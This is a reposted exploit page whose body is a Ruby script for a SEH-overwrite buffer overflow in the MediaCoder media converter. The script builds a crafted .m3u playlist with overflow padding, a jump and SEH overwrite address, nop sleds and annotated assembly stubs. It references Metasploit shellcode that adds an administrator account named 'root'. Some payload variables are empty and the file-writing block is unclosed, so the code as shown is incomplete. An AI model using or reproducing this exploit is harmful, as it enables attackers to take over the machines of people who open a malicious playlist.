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MediaCoder Universal Buffer Overflow Exploit (SEH)
来源:www.vfcocus.net 作者:Stack 发布时间:2009-03-10  
#!/usr/bin/env ruby
# MediaCoder Universal Buffer Overflow Exploit (SEH)
# Universal SEH Overwrite Exploit
# By Stack
# Mountassif Moad
# Download app : http://mediacoder.sourceforge.net/mirrors.htm?file=MediaCoder-
# cat Greatz.txt
# Jadi-Chel7 & Mr.Safa7 & Houssamix & Simo-Soft & DDos & Simo64 & G0rillaz & Issam & Sec-Alert & & Bohayra & j0rd4n14n.r1z
# Webug & Travis-Barker & Keyo & General l0s3r & NeoCoderz & welahima b9ite 3arefe chkoune akhore rani tansa :d
# ahe nsite big thnx to Str0ke and thanks you for all patience and your advice & support
time3 = Time.new
puts "Exploit Started in Current Time :" + time3.inspect
puts "Enter Name For your File Like : Stack"
files = gets.chomp.capitalize
puts "Name Of File : " + files +'.m3u'
time1 = Time.new
Header =
# win32_adduser -  PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com
Shellscode =
# Media_bruteforcer_shellcode
Bruteforce = # BruteForce the shellcode to runing if it dont work in the first methode
"\xD0\x62\x43"+        #  SHL BYTE PTR DS:[EDX+43],1
"\x00\xB8\x6D"+        #  ADD BYTE PTR DS:[EAX+1ABBB6D],BH
"\x00\x00"+            #  ADD BYTE PTR DS:[EAX],AL
"\x00\xF0"+            #  ADD AL,DH
"\xFF\x13"+            #  CALL DWORD PTR DS:[EBX]
"\x00\x4F\x6D"+        #  ADD BYTE PTR DS:[EDI+6D],CL
"\x81\x7C\x38\x07"+    #  CMP DWORD PTR DS:[EAX+EDI+7],FFFF7C92
"\xFF\xFF" + Shellscode
Rhunter =
"\x5B"+             #POP EBX
"\x90" * 10 +       # NOP x 10 
"\x90\x90"+         # NOP NOP
"\x8D\x44\xC1\x04"+ # LEA EAX,DWORD PTR DS:[ECX+EAX*8+4]
"\x8B\x1E"+         # MOV EBX,DWORD PTR DS:[ESI]
"\x89\x18"+         # MOV DWORD PTR DS:[EAX],EBX
"\x89\x06"+         # MOV DWORD PTR DS:[ESI],EAX
"\x42"+             # INC EDX
"\x83\xFA\x64"+     # CMP EDX,64
"\x75\xEC"+         # JNZ SHORT dsp_chmx.0169127E
"\x8B\x06"+         # MOV EAX,DWORD PTR DS:[ESI]
"\x8B\x10"+         # MOV EDX,DWORD PTR DS:[EAX]
"\x89\x16"+         # MOV DWORD PTR DS:[ESI],EDX
"\x5E"+             # POP ESI
"\x5B"+             # POP EBX
"\x93\x43"+         # CALL ESP
Over     = "\x41" * 195 + "\xff\xff\xff\xff" + "\x47" * 4 + "\x42" * 6 + "\xff\xff\x47\x47\x47\xFF\x65\x78\x77\x76"
Nop      = "\x90" * 8
Next_Seh = "\xeb\x06\xff\xff"
Seh      = "\x93\xB6\x98\x7C"
Nopsled  = "\x90" * 7
Xpl = Header + Over + Rhunter + Nop + Shellscode + Nopsled + Next_Seh + Seh + Nop + Bruteforce + Nopsled
File.open( files+".m3u", "w" ) do |the_file|
puts "Exploit finished in Current Time :" + time1.inspect
puts "Now Open " + files +".m3u :d"

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